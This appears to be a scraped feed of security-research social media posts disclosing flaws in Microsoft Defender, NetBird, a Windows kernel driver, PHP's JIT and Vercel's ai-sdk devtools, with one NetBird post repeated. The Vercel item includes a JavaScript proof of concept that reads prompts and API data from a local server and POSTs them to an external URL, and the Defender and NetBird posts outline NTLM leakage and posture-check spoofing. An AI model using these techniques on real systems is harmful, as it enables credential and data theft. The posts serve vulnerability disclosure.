Microsoft Defender scans files as NT AUTHORITY\SYSTEM without impersonating the calling user. Any standard user can point a custom scan at a UNC path and Defender will authenticate to the attacker's server with the machine's NTLM credentials. One PowerShell command, no admin required.
The best part? Microsoft already has the fix built. There's a feature flag in MpSvc.dll called MpFC_EnableImpersonationOnNetworkResourceScan, they just never turned it on and choose to put users at risk.
PoC + writeup: https://t.co/BlDl8WVWtf
Microsoft patched UnDefend (CVE-2026-45498) back in May but all they did was block one locking method. The actual root cause, permissive DACLs on Defender's signature files, is still wide open. Any standard user can freeze signature updates with a single CreateFileW call. That's not a fix.
Huge credit to @ChaoticEclipse0 for the original UnDefend research that inspired this. Their work exposed a fundamental design flaw in how Defender protects its own files and Microsoft's patch proved they didn't fully understand it.
PoC + full writeup: https://t.co/jaGbEg3j1s
It has been a few patches since I wrote this post and they still didn't fix this. For a matter of fact, they have only made it worse.
In those updates they have only added more metadata that can be easily spoofed and the server just says "okay!".
"Zero Trust" that trusts the client.
While auditing NetBird, I discovered that its endpoint posture checks can be bypassed by simply lying to the management server.
NetBird markets itself as a Zero Trust network access platform, yet process checks, OS version checks, and NetBird version checks are all based on metadata supplied by the client itself.
The server asks:
"Are you running CrowdStrike?"
The client replies:
"Yep."
And the server appears to accept that answer when making access-control decisions.
The posture checks can be bypassed by changing a few fields in the client login request.
Need CrowdStrike running? Just say it is.
Need SentinelOne installed? Just say it is.
Need macOS 15? Just say it is.
without any of those actually being present.
As a result, a user on an unmanaged or non-compliant device can potentially satisfy posture requirements and gain access to network segments intended only for managed endpoints.
The fundamental issue is that the system relies on self-attestation for security decisions.
That's not Zero Trust.
That's Trust Me Bro™.
#infosec #bugbounty #zerotrust #securityresearch
Funny how Microsoft attempts to fix Defender resulted in a bug that causes Defender to be unable to delete any malware with NTFS ADS file name, something like C:\test:mlwr.exe will never be deleted by Defender, will be detected but always fails to delete.
Found a 0-day in a widely deployed Windows kernel driver. Any local user → NT AUTHORITY\SYSTEM on fully patched Win11 25H2 due to a race condition leading to a UAF.
Single exe, one click, instant shell.
Report submitted.
"Zero Trust" that trusts the client.
While auditing NetBird, I discovered that its endpoint posture checks can be bypassed by simply lying to the management server.
NetBird markets itself as a Zero Trust network access platform, yet process checks, OS version checks, and NetBird version checks are all based on metadata supplied by the client itself.
The server asks:
"Are you running CrowdStrike?"
The client replies:
"Yep."
And the server appears to accept that answer when making access-control decisions.
The posture checks can be bypassed by changing a few fields in the client login request.
Need CrowdStrike running? Just say it is.
Need SentinelOne installed? Just say it is.
Need macOS 15? Just say it is.
without any of those actually being present.
As a result, a user on an unmanaged or non-compliant device can potentially satisfy posture requirements and gain access to network segments intended only for managed endpoints.
The fundamental issue is that the system relies on self-attestation for security decisions.
That's not Zero Trust.
That's Trust Me Bro™.
#infosec #bugbounty #zerotrust #securityresearch
PHP 8.4/8.5 JIT — Type confusion / UAF in ir_cfg
GH-21395 (UNRESOLVED): ir_cfg_remove_dead_inputs() frees bitset then accesses it.
ASAN: heap-use-after-free at ir_cfg.c:213
GH-21746 (UNRESOLVED): eval'd closure segfaults on 2nd call after warmup loop. Trace invalidation leaves stale pointer.
Confirmed bug in 8.5.5: !isset($user?->token) condition inverted by function JIT.
Workaround exists but bug is live in default builds.
Vercel: ai-sdk/devtools — Wildcard CORS + no auth = full AI prompt exfiltration
Local server localhost:4983 with Access-Control-Allow-Origin: *
Any website can read:
System prompts
Raw API request/response bodies
Tool definitions
Model config
PoC:
fetch('http://localhost:4983/api/runs')
.then(r=>r.json())
.then(runs=>runs.forEach(run=>
fetch(`http://localhost:4983/api/runs/${https://t.co/z0YiHz2Fv7}`)
.then(r=>r.json())
.then(d=>fetch('https://t.co/KsbpVJSGj3',{method:'POST',body:JSON.stringify(d)}))
)
Also /api/clear = destructively wipes entire DB.
@B20_IA@testingcatalog Completely agree, the biggest thing mythos might have over other models I think is the fact it might have higher capabilities of linking primitives.